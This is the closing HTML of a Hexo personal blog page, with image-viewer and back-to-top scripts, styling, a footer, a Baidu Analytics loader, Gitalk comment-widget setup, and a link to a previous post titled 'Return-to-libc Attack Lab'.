  closeButton: "top",
  Image: {
    zoom: true,
  },
  on: {
    initCarousel: (fancybox) => {
      const slide = fancybox.Carousel.slides[fancybox.Carousel.page];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
    "Carousel.change": (fancybox, carousel, to, from) => {
      const slide = carousel.slides[to];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
  },
});
</script>

<style>
    #noneimg img {
        display: none;
        z-index: 9999;
        /* width: 600px !important; */
        min-width: 0%;
        max-width: 90%;
        max-height: 80%;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            max-width: 88%
        }
    }
</style>

    <div class="post-paging">
    
    <a href="/2025/11/04/seedlab2/">
        <div class="post-paging-last">
            <span>上一篇</span>
            <p>Return-to-libc Attack Lab</p>
        </div>
    </a>
    

    
</div>
</div>
		
<div class="footer">
	<div class="Copyright">
		©2025 By Ram. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/79e/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/RamBree">
			<img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: flex;
            align-items: center;
            justify-content: center;
            border-radius: 10px;
            width: 40px;
            height: 40px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            transition: border .5s;
            border: 1px solid rgba(18, 24, 58, 0.06);

            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 20px;
            height: 20px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $( '#js-go_top' )
	.gotoTop( {
		offset: 500,
		speed: 300,
		animationShow: {
			'transform': 'translate(0,0)',
			'transition': 'transform .5s ease-in-out'
		},
		animationHide: {
			'transform': 'translate(100px,0)',
			'transition': 'transform .5s ease-in-out'
		}
	} );
</script>


<!-- Baidu Analytics -->
<script defer>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?f87362af66251bc3b7603e9ecfa19123";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>



    <!-- Gitalk -->
    <script>
        const data = '{"clientID":"02b3c","clientSecret":"adfc7b4","repo":"gimment","owner":"duneng","admin":"duneng"}'
        const gitalk = new Gitalk({
            ...JSON.parse( data),
            id:location.pathname,
            distractionFreeMode:false
        })
        
        if(Boolean('false')){
            gitalk.render('gitalk-container')
        }
    </script>

<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/79e/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>
</html>

